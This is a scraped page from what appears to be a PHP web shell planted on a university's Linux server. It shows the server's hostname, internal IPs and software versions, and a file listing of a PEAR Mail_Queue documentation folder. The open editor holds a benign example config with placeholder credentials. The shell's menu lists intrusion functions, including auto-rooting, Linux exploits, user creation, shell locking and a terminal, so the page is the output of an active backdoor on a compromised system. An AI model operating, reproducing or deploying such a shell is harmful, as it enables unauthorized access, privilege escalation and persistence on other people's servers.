Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
lib /
php /
doc /
Mail_Queue /
docs /
[ HOME SHELL ]
Name
Size
Permission
Action
add_example.php
1.12
KB
-rw-r--r--
base.php
405
B
-rw-r--r--
mdb_mail_queue_schema.xml
2.16
KB
-rw-r--r--
mysql.sql
818
B
-rw-r--r--
pgsql.sql
581
B
-rw-r--r--
README
78
B
-rw-r--r--
send_example.php
219
B
-rw-r--r--
TODO
56
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : base.php
<?php require_once "Mail/Queue.php"; $db_options['type'] = 'db'; $db_options['dsn'] = 'mysql://user:password@host/database'; $db_options['mail_table'] = 'mail_queue'; $mail_options['driver'] = 'smtp'; $mail_options['host'] = 'your_server_smtp.com'; $mail_options['port'] = 25; $mail_options['auth'] = false; $mail_options['username'] = ''; $mail_options['password'] = ''; ?>
Close